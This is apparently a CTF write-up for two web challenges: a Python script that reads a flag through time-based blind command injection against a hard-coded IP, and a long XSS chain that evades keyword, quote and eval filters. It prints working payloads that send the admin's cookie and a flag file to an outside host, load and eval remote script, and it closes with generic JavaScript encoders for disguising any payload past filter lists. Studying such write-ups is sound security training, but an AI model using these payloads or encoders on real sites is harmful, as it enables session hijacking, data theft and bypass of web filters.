Web-帮帮小红花
Same idea as the cut-based blind injection in the i春秋 Christmas CTF: the flag is leaked one character at a time through a command-injection oracle (any of the usual blind techniques works; the script below uses a time-based one). Note that `&` has to be URL-encoded as `%26`, otherwise it is parsed as a query-parameter separator and the `&& sleep` part never reaches the shell.
```python
import requests

# Proxy the author used to watch the requests (e.g. Burp); drop it if not needed.
proxies = {"http": "http://127.0.0.1:4476"}
# Character set of the flag, tried one position at a time.
pay = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-_"
# grep "^<prefix>" /flag succeeds only when the flag starts with <prefix>, and only
# then does `&& sleep 10` run, so a correct prefix shows up as a client-side timeout
# (5 s is well below the 10 s sleep). "%%26" is how a literal "%26" (an encoded "&")
# is written inside a %-format string.
url = "http://183.129.189.60:10074/?imagin=grep \"^%s\" /flag %%26%%26 sleep 10"
result = ""
while True:
    for i in pay:
        try:
            requests.get(url % (result + i), timeout=5, proxies=proxies)
        except requests.exceptions.Timeout:
            # timed out -> the sleep ran -> this character is correct
            result += i
            print(result)
            break
        except KeyboardInterrupt:
            exit(0)
    else:
        # no character extended the prefix: the whole flag has been read
        print("flag:", result)
        break
```
Web-notes
The page hints at a source leak; requesting www.zip returns the source code.
```html
<body onpageshow=alert(1) >
```
A `<body>` tag that appears inside the existing body is not inserted as a new element: the HTML parser merges its attributes into the existing `<body>`, so the effect is the same as if `html > body` itself carried an `onpageshow` attribute (which fires when the page is shown, including on the initial load).
```html
<body onpageshow=window['location'].href=/111/ >

<!-- Quotes are not available, so every string is spelled with a regex literal:
     /l/+1 stringifies to "/l/1", and (/l/+1)[1] is the letter "l".
     Caveat: (/\//+1)[1] is "/\//1"[1], i.e. a backslash, not a slash. The resulting
     URL is http:\\api.chara.pub\<cookie>; browsers normalise "\" to "/" when parsing
     http(s) URLs, so the redirect still lands. -->
<body onpageshow=window[(/l/+1)[1]+(/o/+1)[1]+(/c/+1)[1]+(/a/+1)[1]+(/t/+1)[1]+(/i/+1)[1]+(/o/+1)[1]+(/n/+1)[1]].href=(/h/+1)[1]+(/t/+1)[1]+(/t/+1)[1]+(/p/+1)[1]+(/:/+1)[1]+(/\//+1)[1]+(/\//+1)[1]+(/a/+1)[1]+(/p/+1)[1]+(/i/+1)[1]+(/./+1)[1]+(/c/+1)[1]+(/h/+1)[1]+(/a/+1)[1]+(/r/+1)[1]+(/a/+1)[1]+(/./+1)[1]+(/p/+1)[1]+(/u/+1)[1]+(/b/+1)[1]+(/\//+1)[1]+document[(/c/+1)[1]+(/o/+1)[1]+(/o/+1)[1]+(/k/+1)[1]+(/i/+1)[1]+(/e/+1)[1]] />
```
The URL length is limited to 500 characters, so the payload has to be shortened: one regex literal per word instead of one per letter.
```html
<!-- building blocks (the escaped slashes stay as "\/" in the string; the browser
     treats "\" as "/" in an http URL, so the target is still reached) -->
(/http:\/\/ctf.chara.pub\//+1).substring(1,25)   -> http:\/\/ctf.chara.pub\/
(/l/+1)[1]+(/ocation/+1).substring(1,8)         -> location
(/c/+1)[1]+(/ookies/+1).substring(1,7)          -> cookies

<body onpageshow=window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+document[(/c/+1)[1]+(/ookie/+1).substring(1,6)] />
```
This does exfiltrate the admin's PHPSESSID, but it is of no use here.
```html
<!-- plain version: load a script from our server and eval it -->
a=new XMLHttpRequest();a.open("GET","http://ctf.chara.pub",1);a.onreadystatechange=function(){eval(a.responseText)};a.send(null)
<!-- "GET" and the URL spelled with the regex trick -->
a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=function(){eval(a.responseText)};a.send(null)
<!-- "function" is filtered: use an arrow function instead; responseText is spelled as
     (/r/+1)[1]+(/esponseText/+1).substring(1,12) -->
a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null)
<body onpageshow=a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null) />
```
The CSP does not let XMLHttpRequest reach external origins, so the remaining option is to read the flag from the same origin and then get it out, e.g. by submitting it in the username field.
The username has a format restriction, so either the flag is exfiltrated in several pieces or it is carried out in a navigation via window.location.href (navigation is not covered by the CSP connect-src restriction).
`new XMLHttpRequest()` needs a space after `new`, and a space would end the unquoted attribute value, so use fetch instead.
```html
<!-- plain version: read /lib/flag.php and carry the body out in a redirect -->
fetch("/lib/flag.php",{method:"GET"}).then((r)=>{r.text().then((r)=>{window.location.href="http://ctf.chara.pub/"+r})})
<!-- the path: in one piece, or split so that the word "flag" never appears verbatim -->
(/\/lib\/flag.php/+1).substring(2,16)                              -> /lib\/flag.php
(/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8)         -> /lib\/flag.php
<!-- "then" is stored once in a, "fetch" is looked up on window -->
a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})})
<body onpageshow=a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})}) />
```
Getting around `=>`: the `>` of an arrow function ends the unquoted `onpageshow=` attribute value in the HTML tokenizer, and `function` is filtered, so the handler cannot be written directly.
Build the whole payload as a string and hand it to eval instead?
The challenge seems to have been changed since: `eval` is filtered now as well, so it has to be reached as `window['eval']` with the name spelled by the regex trick.
```html
<!-- The whole payload is one regex literal with digit placeholders for characters that
     cannot sit in the regex body or in the unquoted attribute:
       1 -> " (34), 2 -> / (47), 3 -> > (62)
     "+4" closes the literal with a digit that is not a placeholder; the replace() calls
     restore the characters and substring(1,120) strips the leading "/" and trailing "/4". -->
a=String.fromCharCode; b=(/fetch(12lib2flag.php1,{method:1GET1}).then((r)=3{r.text().then((r)=3{window.location.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b)
<!-- Final payload: additionally 5 -> f (102), 6 -> e (101), 7 -> o (111) break up the
     filtered words fetch, flag, then and location; eval is called as window["eval"]
     spelled with the same trick. -->
<body onpageshow=a=String.fromCharCode;b=(/5etch(12lib25lag.php1,{method:1GET1}).th6n((r)=3{r.text().th6n((r)=3{window.l7cation.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).replace(/5/g,a(102)).replace(/6/g,a(101)).replace(/7/g,a(111)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b) />
```
The length may still be slightly over the limit (my own measurement was 499), so serve the payload from a small Flask endpoint that answers with a 302 to the long URL; submitting the short redirect URL works.
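Added example (my own code, not part of the writeup): generators for the two quote-free string-building tricks used above, so a payload can be re-encoded for a different filter list instead of being assembled by hand. It generalises the hand-built payloads to arbitrary strings: `regexChunkExpr` produces the `(/chunk/+1).substring(...)` form, taking the longest chunk that is a valid regex body at each position and falling back to `String.fromCharCode` for characters that can never sit in a literal (such as `/`), so no stray backslashes end up in the result; `placeholderExpr` produces the single-literal-plus-`replace()` form with digit placeholders for special characters and for the first letter of each filtered word. The function names, the use of `new RegExp` as a validity oracle and the `fitsUnquotedAttribute` check are my assumptions; the sample payload and the filter words (`fetch`, `flag`, `then`, `location`) are the ones from the payloads above.

```javascript
// Added example: encoders for the regex-literal string tricks (not the writeup's code).
//
// Trick 1: (/abc/+1) stringifies to "/abc/1", so (/abc/+1).substring(1,4) is "abc"
//          and (/a/+1)[1] is "a". No quote character is needed.
// Trick 2: one regex literal for the whole payload, with spare digits standing in for
//          characters that cannot sit in the literal body or in an unquoted attribute,
//          restored afterwards with replace().

// Characters that can never appear unescaped inside a regex literal body.
const NEVER_IN_LITERAL = new Set(['/', '\\', '\n', '\r', '\u2028', '\u2029']);

// True if the literal /chunk/ is valid and stringifies back to exactly "/chunk/".
// new RegExp() is the oracle: it rejects what a literal rejects (unbalanced "(",
// a leading "*", ...) and .source reveals any re-escaping.
function isLiteralSafe(chunk, bannedWords) {
  for (const ch of chunk) if (NEVER_IN_LITERAL.has(ch)) return false;
  if (bannedWords.some((w) => chunk.includes(w))) return false;
  try {
    return new RegExp(chunk).source === chunk;
  } catch (e) {
    return false;
  }
}

// Trick 1: spell `str` as a sum of regex-literal slices. At each position the longest
// literal-safe chunk is taken; a character that cannot be spelled in a literal at all
// (e.g. "/") falls back to String.fromCharCode.
function regexChunkExpr(str, bannedWords = []) {
  const parts = [];
  let i = 0;
  while (i < str.length) {
    let j = str.length;
    while (j > i && !isLiteralSafe(str.slice(i, j), bannedWords)) j--;
    if (j === i) {
      parts.push(`String.fromCharCode(${str.charCodeAt(i)})`);
      i += 1;
      continue;
    }
    const chunk = str.slice(i, j);
    // A single character uses the shorter (/x/+1)[1] form, as the writeup does.
    parts.push(chunk.length === 1
      ? `(/${chunk}/+1)[1]`
      : `(/${chunk}/+1).substring(1,${1 + chunk.length})`);
    i = j;
  }
  return parts.join('+');
}

// Trick 2: one regex literal with digit placeholders. `specialChars` are characters
// to keep out of the literal body (" / > in the writeup); each word in `bannedWords`
// is broken by swapping out its first letter everywhere. `a` is bound to
// String.fromCharCode inside the expression, which evaluates to the decoded string.
function placeholderExpr(str, specialChars, bannedWords = []) {
  const spare = [...'0123456789'].filter((d) => !str.includes(d));
  const swap = [...new Set([...specialChars, ...bannedWords.map((w) => w[0])])]
    .filter((c) => str.includes(c));
  if (swap.length + 1 > spare.length) throw new Error('not enough spare digits');
  let body = str;
  const restore = [];
  swap.forEach((c, k) => {
    body = body.split(c).join(spare[k]);
    restore.push(`.replace(/${spare[k]}/g,a(${c.charCodeAt(0)}))`);
  });
  if (!isLiteralSafe(body, bannedWords)) throw new Error('body is not a valid regex literal');
  // "+<digit>" closes the literal with a digit that is not a placeholder; substring
  // drops the leading "/" and the trailing "/<digit>" (replacement keeps the length).
  const expr = `(a=String.fromCharCode,(/${body}/+${spare[swap.length]})` +
               `${restore.join('')}.substring(1,${1 + body.length}))`;
  const leak = bannedWords.find((w) => expr.includes(w));
  if (leak) throw new Error(`banned word "${leak}" survives in the wrapper code`);
  return expr;
}

// Whitespace or ">" terminates an unquoted attribute value such as <body onpageshow=...>,
// so the final expression must contain neither.
function fitsUnquotedAttribute(expr) {
  return !/[\s>]/.test(expr);
}

// Evaluate a generated expression as sloppy-mode global code (what the victim page
// does) and return its value; used to self-check the encoders offline.
function runExpr(expr) {
  return Function(`return (${expr});`)();
}
```

For the fetch payload above, `placeholderExpr(payload, ['"', '/', '>'], ['fetch', 'flag', 'then', 'location'])` reproduces the shape of the final payload (six placeholder digits, a non-placeholder digit after `+`, and `substring(1,120)`); what remains is to pass the result to `window["eval"]` with the name spelled by `regexChunkExpr('eval')`, and to check the total against the 500-character URL limit.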